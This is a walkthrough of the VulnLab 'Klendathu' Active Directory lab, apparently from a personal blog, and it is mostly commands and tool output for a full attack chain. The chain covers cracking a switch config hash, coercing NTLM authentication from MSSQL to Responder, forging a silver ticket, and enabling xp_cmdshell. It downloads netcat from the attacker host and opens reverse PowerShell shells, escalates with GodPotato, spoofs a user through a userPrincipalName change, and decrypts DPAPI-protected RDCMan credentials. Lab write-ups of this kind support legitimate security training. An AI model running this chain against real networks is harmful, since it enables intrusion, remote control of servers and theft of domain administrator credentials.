vulnlab-klendathu
Klendathu, an insane rated AD chain.
solved with , a nfs share containing a config file with password hash of zim@klendathu,vl, having guest access on MSSQL service, forcing authentication with sys.dm_os_file_exist
, forging silver ticket
then escalating privileges on SRV1
, spoofing domain user on SRV2
with the MSSQL user and then using ntdissector , a swiss army knife for your NTDS.dit files, and decrypting RDCMan
credentials with domain backup key using rdgdec.py
.
.
NFS Enum
$ showmount -e srv2.klendathu.vl Export list for srv2.klendathu.vl: /mnt/nfs_shares *
.
$ sudo mount -t nfs srv2.klendathu.vl:/mnt/nfs_shares /home/puck/vulnlab/klendathu/shares
.
(puck㉿kali)-[~/vulnlab/klendathu/shares] $ cat Switch344_running-config.cfg Switch344#show running-config Building configuration... Current configuration : 4716 bytes version 12.2 ..snip.. enable secret 5 $1$j61qxI/P$dPYII5uCu83j8/FIuT2Wb/ enable password C1sc0 ..snip.. snmp-server community public RO snmp-server contact ZIM@KLENDATHU.VL ! end Switch344#
.
$ ./kerbrute_linux_amd64 userenum -d klendathu.vl --dc dc1.klendathu.vl ./users.txt -v __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.3 (9dad6e1) - 08/29/24 - Ronnie Flathers @ropnop 2024/08/29 10:14:58 > Using KDC(s): 2024/08/29 10:14:58 > dc1.klendathu.vl:88 2024/08/29 10:14:58 > [!] %q - %v Bad username: blank 2024/08/29 10:14:58 > [+] VALID USERNAME: administrator@klendathu.vl 2024/08/29 10:14:58 > [!] guest@klendathu.vl - USER LOCKED OUT 2024/08/29 10:15:03 > [+] VALID USERNAME: zim@klendathu.vl 2024/08/29 10:15:03 > Done! Tested 4 usernames (2 valid) in 5.043 seconds
.
$ hashcat -a 0 -m 500 ./ciscosecret.txt /usr/share/wordlists/rockyou.txt --force Dictionary cache hit: * Filename..: /usr/share/wordlists/rockyou.txt * Passwords.: 14344385 * Bytes.....: 139921507 * Keyspace..: 14344385 $1$j61qxI/P$dPYII5uCu83j8/FIuT2Wb/:fo<redacted>22
.
$ netexec smb dc1.klendathu.vl -u 'zim' -p 'fo<redacted>22' --shares SMB 10.10.220.149 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:KLENDATHU.VL) (signing:True) (SMBv1:False) SMB 10.10.220.149 445 DC1 [+] KLENDATHU.VL\zim:football22 SMB 10.10.220.149 445 DC1 [*] Enumerated shares SMB 10.10.220.149 445 DC1 Share Permissions Remark SMB 10.10.220.149 445 DC1 ----- ----------- ------ SMB 10.10.220.149 445 DC1 ADMIN$ Remote Admin SMB 10.10.220.149 445 DC1 C$ Default share SMB 10.10.220.149 445 DC1 HomeDirs READ SMB 10.10.220.149 445 DC1 IPC$ READ Remote IPC SMB 10.10.220.149 445 DC1 NETLOGON READ Logon server share SMB 10.10.220.149 445 DC1 SYSVOL READ Logon server share
.
$ netexec smb srv1.klendathu.vl -u 'zim' -p 'fo<redacted>22' --shares SMB 10.10.220.150 445 SRV1 [*] Windows Server 2022 Build 20348 x64 (name:SRV1) (domain:KLENDATHU.VL) (signing:True) (SMBv1:False) SMB 10.10.220.150 445 SRV1 [+] KLENDATHU.VL\zim:football22 SMB 10.10.220.150 445 SRV1 [*] Enumerated shares SMB 10.10.220.150 445 SRV1 Share Permissions Remark SMB 10.10.220.150 445 SRV1 ----- ----------- ------ SMB 10.10.220.150 445 SRV1 ADMIN$ Remote Admin SMB 10.10.220.150 445 SRV1 C$ Default share SMB 10.10.220.150 445 SRV1 IPC$ READ Remote IPC
.
$ impacket-smbclient zim@dc1.klendathu.vl Impacket v0.12.0.dev1 - Copyright 2023 Fortra Password:fo<redacted>22 Type help for list of commands # shares ADMIN$ C$ HomeDirs IPC$ NETLOGON SYSVOL # use HomeDirs # ls drw-rw-rw- 0 Thu Apr 11 02:58:10 2024 . drw-rw-rw- 0 Mon Apr 15 18:09:19 2024 .. drw-rw-rw- 0 Fri Apr 12 06:07:56 2024 CLEA drw-rw-rw- 0 Fri Apr 12 06:08:12 2024 DUNN drw-rw-rw- 0 Sat Apr 13 03:32:21 2024 JENKINS drw-rw-rw- 0 Fri Apr 12 06:08:59 2024 SHUJUMI # cd CLEA [-] SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
Bloodhound Enum
$ bloodhound-python -d klendathu.vl -c all -u zim -p fo<redacted>22 -ns 10.10.220.149 --zip INFO: Found AD domain: klendathu.vl INFO: Getting TGT for user INFO: Connecting to LDAP server: dc1.klendathu.vl INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 4 computers INFO: Connecting to LDAP server: dc1.klendathu.vl INFO: Found 26 users INFO: Found 57 groups INFO: Found 6 gpos INFO: Found 1 ous INFO: Found 19 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: srv2.klendathu.vl INFO: Querying computer: SRV1.KLENDATHU.VL INFO: Querying computer: WS1.KLENDATHU.VL INFO: Querying computer: DC1.KLENDATHU.VL INFO: Done in 00M 05S INFO: Compressing output into 20240829103520_bloodhound.zip
MSSQL access
We have MSSQL running on SRV1, so check if we can login there
$ netexec mssql srv1.klendathu.vl -u 'zim' -p 'fo<redacted>22' MSSQL 10.10.220.150 1433 SRV1 [*] Windows Server 2022 Build 20348 (name:SRV1) (domain:KLENDATHU.VL) MSSQL 10.10.220.150 1433 SRV1 [+] KLENDATHU.VL\zim:foo<redacted>22
.
$ impacket-mssqlclient klendathu.vl/zim:'fo<redacted>22'@srv1.klendathu.vl -windows-auth Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(SRV1\SQLEXPRESS): Line 1: Changed database context to 'master'. [*] INFO(SRV1\SQLEXPRESS): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (160 3232) [!] Press help for extra shell commands SQL (KLENDATHU\ZIM guest@master)> enable_xp_cmdshell ERROR: Line 1: You do not have permission to run the RECONFIGURE statement. SQL (KLENDATHU\ZIM guest@master)> SELECT user_name() ----- guest SQL (KLENDATHU\ZIM guest@master)> xp_fileexist 'C:\' File Exists File is a Directory Parent Directory Exists ----------- ------------------- ----------------------- 0 1 1 SQL (KLENDATHU\ZIM guest@master)> xp_fileexist '\\10.8.2.138\puck:\' File Exists File is a Directory Parent Directory Exists ----------- ------------------- ----------------------- 0 0 0 SQL (KLENDATHU\ZIM guest@master)> SELECT * FROM sys.dm_os_file_exists('\\10.8.2.138\puck\') file_exists file_is_a_directory parent_directory_exists ----------- ------------------- ----------------------- ERROR: Line 1: The operating system returned the error '0x80070005(Access is denied.)' while attempting 'SvlPathDoesPathExist' on '\\10.8.2.138\puck\'. SQL (KLENDATHU\ZIM guest@master)>
we are guest, but we can use SELECT * FROM sys.dm_os_file_exists to find (with responder) the hash of the service account used to start the mssql service
responder -I tun0 [+] Current Session Variables: Responder Machine Name [WIN-GUNQV4VD574] Responder Domain Name [0N40.LOCAL] Responder DCE-RPC Port [47623] [+] Listening for events... [SMB] NTLMv2-SSP Client : 10.10.220.150 [SMB] NTLMv2-SSP Username : KLENDATHU\RASCZAK [SMB] NTLMv2-SSP Hash : RASCZAK::KLENDATHU:fc8c0f83e62ac68d:CCC3AE57C3615A1CD355265E9D4860BA:01<redacted>00
.
$ hashcat -a 0 -m 5600 ./rasczak.hash /usr/share/wordlists/rockyou.txt --force hashcat (v6.2.6) starting this attack: 2 MB Dictionary cache hit: * Filename..: /usr/share/wordlists/rockyou.txt * Passwords.: 14344385 * Bytes.....: 139921507 * Keyspace..: 14344385 RASCZAK::KLENDATHU:fc8c0f83e62ac68d:ccc3ae57c3615a1cd355265e9d4860ba:010<redacted>00:st<redacted>99
Forging Silver Ticket
The mssql service is running as RASCZAK user so we create a silver ticket for him.
ldapdump
$ ldapdomaindump klendathu.vl -u 'klendathu\rasczak' -p 'st<redacted>99' [*] Connecting to host... [*] Binding to host [+] Bind OK [*] Starting domain dump [+] Domain dump finished
to get the domain sid
$ cat domain_users.grep | grep RAS RASCZAK RASCZAK RASCZAK Domain Users 04/11/24 00:35:58 08/29/24 07:55:28 08/29/24 07:55:28 NORMAL_ACCOUNT 04/12/24 03:46:53 S-1-5-21-641890747-1618203462-755025521-1131
convert the plain text pasword into nthash
$ iconv -f ASCII -t UTF-16LE <(printf "st<redacted>99") | openssl dgst -md4 MD4(stdin)= e2<redacted>2c
create the silver ticket
$ impacket-ticketer -nthash e2<redacted>2c -spn MSSQLSvc/SRV1.KLENDATHU.VL -domain KLENDATHU.VL -domain-sid S-1-5-21-641890747-1618203462-755025521 administrator Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Creating basic skeleton ticket and PAC Infos [*] Customizing ticket for KLENDATHU.VL/administrator [*] PAC_LOGON_INFO [*] PAC_CLIENT_INFO_TYPE [*] EncTicketPart [*] EncTGSRepPart [*] Signing/Encrypting final ticket [*] PAC_SERVER_CHECKSUM [*] PAC_PRIVSVR_CHECKSUM [*] EncTicketPart [*] EncTGSRepPart [*] Saving ticket in administrator.ccache $ export KRB5CCNAME=administrator.ccache
when on mssql shell 1st run:
# Enable xp_cmdshell > EXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; # Verify we have SeImpersonatePrivilege > xp_cmdshell "whoami /priv"
.
$ impacket-mssqlclient srv1.klendathu.vl -windows-auth -k Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(SRV1\SQLEXPRESS): Line 1: Changed database context to 'master'. [*] INFO(SRV1\SQLEXPRESS): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (160 3232) [!] Press help for extra shell commands SQL (KLENDATHU.VL\administrator dbo@master)> SQL (KLENDATHU.VL\administrator dbo@master)> xp_cmdshell "echo IWR http://10.8.2.138:8000/nc64.exe -OutFile %TEMP%\nc64.exe | powershell -noprofile" output -------------------------------------------------------------------------------- PS C:\Windows\system32> IWR http://10.8.2.138:8000/nc64.exe -OutFile C:\Users\RASCZAK\AppData\Local\Temp\nc64.exe PS C:\Windows\system32> SQL (KLENDATHU.VL\administrator dbo@master)> xp_cmdshell "%TEMP%\nc64.exe 10.8.2.138 9001 -e powershell"
getting the reverse shell
$ rlwrap nc -nlvp 9001 listening on [any] 9001 ... connect to [10.8.2.138] from (UNKNOWN) [10.10.220.150] 55835 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows PS C:\Windows\system32> whoami /all whoami /all USER INFORMATION ---------------- User Name SID ================= ============================================ klendathu\rasczak S-1-5-21-641890747-1618203462-755025521-1131
godpotato for privesc
PS C:\temp> ./god.exe -cmd "cmd /c C:\temp\nc64.exe 10.8.2.138 9002 -e powershell" ./god.exe -cmd "cmd /c C:\temp\nc64.exe 10.8.2.138 9002 -e powershell" [*] CombaseModule: 0x140725375598592 [*] DispatchTable: 0x140725378185544 [*] UseProtseqFunction: 0x140725377480928 [*] UseProtseqFunctionParamCount: 6 [*] HookRPC [*] Start PipeServer [*] Trigger RPCSS [*] CreateNamedPipe \\.\pipe\314ec62a-eb25-45da-88cd-6f362aabd8cc\pipe\epmapper [*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046 [*] DCOM obj IPID: 00003002-0ca4-ffff-4078-59003fb3e6aa [*] DCOM obj OXID: 0xb95cceeab6278323 [*] DCOM obj OID: 0xed06ad8662383e60 [*] DCOM obj Flags: 0x281 [*] DCOM obj PublicRefs: 0x0 [*] Marshal Object bytes len: 100 [*] UnMarshal Object [*] Pipe Connected! [*] CurrentUser: NT AUTHORITY\NETWORK SERVICE [*] CurrentsImpersonationLevel: Impersonation [*] Start Search System Token [*] PID : 884 Token:0x772 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation [*] Find System Token : True [*] UnmarshalObject: 0x80070776 [*] CurrentUser: NT AUTHORITY\SYSTEM [*] process start with pid 1092
getting the elevated reverse shell
$ rlwrap nc -nlvp 9002 listening on [any] 9002 ... connect to [10.8.2.138] from (UNKNOWN) [10.10.220.150] 55972 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows PS C:\temp> whoami whoami nt authority\system PS C:\temp> hostname hostname SRV1
.
PS C:\users> cmd -c 'dir /A' cmd -c 'dir /A' Microsoft Windows [Version 10.0.20348.2402] (c) Microsoft Corporation. All rights reserved. C:\users> C:\Users\Administrator\Desktop>type flag.txt type flag.txt VL{9f<redacted>ef}
Spoofing Domain Users On GSSAPI Authentication
Checking Bloodhound outbound control on RASCZAK , we have GenericWrite
and ForeChangePassword
on two domain users, rico
and ibanez
, with this ACL we can change the password using rpcclient
or net rpc
$ net rpc password "ibanez" 'Summer2024!' -U "dc1.klendathu.vl"/"Rasczak"%"st<redacted>99" -S "10.10.220.149"
verifying creds
$ crackmapexec smb 10.10.220.149 -u 'ibanez' -p 'Summer2024!' SMB 10.10.220.149 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:KLENDATHU.VL) (signing:True) (SMBv1:False) SMB 10.10.220.149 445 DC1 [+] KLENDATHU.VL\ibanez:Summer2024!
There’s a research done by Ceri Coburn from Pen Test Partners, where linux servers joined to AD have misconfiguration in the authentication mechanism where name-type, enterprise is used (NT_ENTERPRISE), if we have GenericWrite on a domain user, we can edit the userPrincipalName
attribute, this attribute is utilized by NT_ENTERPRISE
through which we can spoof domain users To abuse this we need to first identify the user that we’ll spoof, there’s a group named LINUX_ADMINS
with two members flores and leivy
Then adding userPrincpalName
to be any of the two users, for adding this attribute we can use ldapmodify
for that we need to create a ldif
file
$ ldapmodify -H ldap://dc1.klendathu.vl -a -x -D "CN=RASCZAK,CN=USERS,DC=KLENDATHU,DC=VL" -W -f ./modify_user.ldif Enter LDAP Password: st<redacted>99 modifying entry "CN=ibanez,CN=users,DC=klendathu,DC=vl"
.
$ cat modify_user.ldif dn: CN=ibanez,CN=users,DC=klendathu,DC=vl changetype: modify add: userPrincipalName userPrincipalName: leivy
verify if ldap attribute is added/changed correctly
$ ldapsearch -x -H ldap://dc1.klendathu.vl -D "CN=ibanez,CN=USERS,DC=KLENDATHU,DC=VL" -w 'Summer2024!' -b "DC=klendathu,DC=vl" '(cn=ibanez)' | grep -I userPrincipalName userPrincipalName: leivy
tried Rubeus, but this did not work for me.
c:\temp>Rubeus.exe asktgt /user:leivy /password:Summer2024! /principletype:enterprise Rubeus.exe asktgt /user:leivy /password:Summer2024! /principletype:enterprise ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.3.2 [*] Action: Ask TGT [*] Got domain: KLENDATHU.VL [*] Using rc4_hmac hash: 72F0EEFCC213EA8F350773B831CF2C9C [*] Building AS-REQ (w/ preauth) for: 'KLENDATHU.VL\leivy' [*] Using domain controller: 10.10.220.149:88 [X] KRB-ERROR (24) : KDC_ERR_PREAUTH_FAILED:
Next i found how to Add -principal option to getTGT.py
.
(puck㉿kali)-[~/vulnlab/klendathu] $ git clone https://github.com/ar0x4/impacket.git $ python3 -m venv venv $ source venv/bin/activate $ pip3 install -r requirements.txt (venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket] $ cp examples/getTGT.py . (venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket] $ python3 getTGT.py klendathu.vl/'leivy':'Summer2024!' -dc-ip 10.10.220.149 -principal NT_ENTERPRISE Cannot determine Impacket version. If running from source you should at least run "python setup.py egg_info" Impacket v? - Copyright 2023 Fortra [*] Saving ticket in leivy.ccache
.
(venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket] $ export KRB5CCNAME=leivy.ccache (venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket] $ klist Ticket cache: FILE:leivy.ccache Default principal: leivy@KLENDATHU.VL Valid starting Expires Service principal 08/29/2024 16:21:31 08/30/2024 02:21:31 krbtgt/KLENDATHU.VL@KLENDATHU.VL renew until 08/30/2024 16:21:33
We need to modify our /etc/krb5.conf
[libdefaults] default_realm = KLENDATHU.VL dns_lookup_realm = false dns_lookup_kdc = true # The following krb5.conf variables are only for MIT Kerberos. kdc_timesync = 1 ccache_type = 4 forwardable = true proxiable = true rdns = false [realms] KLENDATHU.VL = { kdc = dc1.klendathu.vl admin_server = dc1.klendathu.vl } [domain_realm] .klendathu.vl = KLENDATHU.VL klendathu.vl = KLENDATHU.VL
Now we can ssh using Kerberos authentication to srv2
after becoming root we we go in /root/inc5543_domaincontroller_backup/
and transfer this backup to our kali box
(venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket] $ ssh -K leivy@klendathu.vl@srv2.klendathu.vl Last failed login: Thu Aug 29 10:26:37 EDT 2024 from 10.8.2.138 on ssh:notty There was 1 failed login attempt since the last successful login. [leivy@KLENDATHU.VL@srv2 ~]$ id uid=990001115(leivy@KLENDATHU.VL) gid=990000513(domain users@KLENDATHU.VL) groups=990000513(domain users@KLENDATHU.VL),990001106(linux_admins@KLENDATHU.VL) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 [leivy@KLENDATHU.VL@srv2 /]$ sudo su [root@srv2 /]# cd /root [root@srv2 ~]# ls anaconda-ks.cfg flag.txt inc5543_domaincontroller_backup [root@srv2 ~]# cat flag.txt VL{8c<redacted>fd} [root@srv2 ~]# cd inc5543_domaincontroller_backup/ [root@srv2 inc5543_domaincontroller_backup]# ls 'Active Directory' note.txt registry [root@srv2 inc5543_domaincontroller_backup]# cat note.txt Incident: INC5543 I've included a backup of the domain controller before resetting all passwords after the last breach [root@srv2 inc5543_domaincontroller_backup]#
transfer /tmp/krb5cc_990001135 file to kali
Decrypting RDCMan password
┌──(puck㉿kali)-[~/vulnlab/klendathu] └─$ export KRB5CCNAME=krb5cc_990001135 ┌──(puck㉿kali)-[~/vulnlab/klendathu] └─$ klist Ticket cache: FILE:krb5cc_990001135 Default principal: svc_backup@KLENDATHU.VL Valid starting Expires Service principal 08/29/2024 16:37:51 08/30/2024 02:37:51 krbtgt/KLENDATHU.VL@KLENDATHU.VL renew until 09/05/2024 16:37:51 ┌──(puck㉿kali)-[~/vulnlab/klendathu] └─$ impacket-smbclient klendathu.vl/svc_backup@dc1.klendathu.vl -k -no-pass Impacket v0.12.0.dev1 - Copyright 2023 Fortra Type help for list of commands # shares ADMIN$ C$ HomeDirs IPC$ NETLOGON SYSVOL # use HomeDirs # cd Jenkins # ls drw-rw-rw- 0 Sat Apr 13 03:32:21 2024 . drw-rw-rw- 0 Thu Apr 11 02:58:10 2024 .. -rw-rw-rw- 101234 Sat Apr 13 03:32:11 2024 AppData_Roaming_Backup.zip -rw-rw-rw- 1077 Fri Apr 12 06:08:35 2024 jenkins.rdg # get jenkins.rdg # get AppData_Roaming_Backup.zip
.
Decrypt a .rdg password using ntdissector and dpapilab
We tranfers the content of ‘HomeDirs/JENKINS’ : to our kali box
we unzip AppData_Roaming_Backup.zip , and cat jenkins.rdg
<?xml version="1.0" encoding="utf-8"?> <RDCMan programVersion="2.93" schemaVersion="3"> <file> <credentialsProfiles> <credentialsProfile inherit="None"> <profileName scope="Local">KLENDATHU\administrator</profileName> <userName>administrator</userName> <password>AQ[...]ShAxQ==</password> <domain>KLENDATHU</domain> </credentialsProfile> </credentialsProfiles> <properties> <expanded>True</expanded> <name>jenkins</name> </properties> <server> <properties> <name>dc1.klendathu.vl</name> </properties> <logonCredentials inherit="None"> <profileName scope="File">KLENDATHU\administrator</profileName> </logonCredentials> </server> </file> <connected /> <favorites /> <recentlyUsed /> </RDCMan>
So we have a encrypted password
After extracting the .zip wealso have the path of master keys “./Roaming/Microsoft/Protect”
Next i used a Ubuntu box to do this decrypting
.
puck@edge-meppel:~$ python3 -m venv venv puck@edge-meppel:~$ source venv/bin/activate (venv) puck@edge-meppel:~$ cd ntdissector/ (venv) puck@edge-meppel:~/ntdissector$ ntdissector -h usage: ntdissector [-h] [-V] [-system SYSTEM] -ntds NTDS [-bootKey BOOTKEY] [-outputdir OUTPUTDIR] [-cachedir CACHEDIR] [-f FILTER] [-filters] [-limit LIMIT] [-cn] [-debug] [-verbose] [-silent] [-ts] [-keepDel] [-w WORKERS] [-nocache] [-dryRun] NTDS Dissector v1.0 options: -h, --help show this help message and exit -V, --version Display version info Examples: > Dump users, groups and domain backup keys $ ntdissector -ntds NTDS.dit -system SYSTEM -outputdir /tmp/ntdissector/ -ts -f user,group,secret > Dump all records from the database $ ntdissector -ntds NTDS.dit -system SYSTEM -outputdir /tmp/ntdissector/ -ts -f all > Dump user objects and include deleted records $ ntdissector -ntds NTDS.dit -system SYSTEM -outputdir /tmp/ntdissector/ -ts -f user -keepDel > List object classes available to filter records $ ntdissector -ntds NTDS.dit -filters (venv) puck@edge-meppel:~/ntdissector$ ntdissector -ntds /home/puck/ntds.dit -system /home/puck/SYSTEM -outputdir /tmp/t est -ts -f all [2024-08-30 15:25:27] [-] Couldn't load cache file /home/puck/.ntdissector/.cache/b872bd512882c00832b578725a57ca5c/__objectClassSchema.json -> [Errno 2] No such file or directory: '/home/puck/.ntdissector/.cache/b872bd512882c00832b578725a57ca5c/__objectClassSchema.json' [2024-08-30 15:25:27] [*] Building the schemas, please wait... [2024-08-30 15:25:29] [*] PEK # 0 found and decrypted: feab48d5655b005f0fed603c166c587f [2024-08-30 15:25:29] [*] Filtering records with this list of object classes : ['all'] [2024-08-30 15:25:29] [*] Ignoring records marked as deleted 100%|███████████████████████████████████████████████████████████████████████████| 3747/3747 [00:00<00:00, 7281.52rec./s] [2024-08-30 15:25:30] [*] Finished, matched 3708 records out of 3747 [2024-08-30 15:25:30] [*] Processing 3708 serialization tasks 100%|████████████████████████████████████████████████████████████████████████████| 3708/3708 [00:17<00:00, 192.28rec./s] (venv) puck@edge-meppel:~/ntdissector$
.
(venv) puck@edge-meppel:/tmp/test/out/b872bd512882c00832b578725a57ca5c$ cat secret.json | jq { "lastSetTime": "2024-04-10T23:33:43.254871+00:00", "priorSetTime": "2024-04-10T23:33:43.254871+00:00", "dSCorePropagationData": "1601-01-01T00:00:00+00:00", "isCriticalSystemObject": 1, "showInAdvancedViewOnly": 1, "distinguishedName": "CN=BCKUPKEY_e6630be8-09ee-4a28-bcb1-e725e585d832 Secret,CN=System,DC=KLENDATHU,DC=VL", "objectClass": [ "secret", "leaf", "top" ], "replPropertyMetaData": "01000000000000000c000000000000000000000001000000d7b2271c03000000c98b69a9c485a44f8204cfa32ce1e18e2<redacted>0010500000000000515000000bb79422646d3736071c6002d00020000", "objectGUID": "2a015493-fc08-40bc-b15e-d6936ba6bc59", "objectCategory": "CN=Secret,CN=Schema,CN=Configuration,DC=KLENDATHU,DC=VL" } (venv) puck@edge-meppel:/tmp/test/out/b872bd512882c00832b578725a57ca5c$
rdgdecrypt
(venv) puck@edge-meppel:~$ python3 ./rdgdec.py ./jenkins.rdg --masterkey /home/puck/Roaming/Microsoft/Protect/S-1-5-21-641890747-1618203462-755025521-1110 --sid S-1-5-21-641890747-1618203462-755025521-1110 -k ./pvk.key [+] Profile: KLENDATHU\administrator Username: administrator Domain: KLENDATHU Password: @@M<redacted>s@@ ------------------------------------------------------------------------------- [+] Decrypted 1 out of 1 credentials
What a ride !
used links:
https://github.com/ar0x4/impacket.git
https://github.com/synacktiv/ntdissector
https://github.com/tijldeneut/dpapilab-ng
.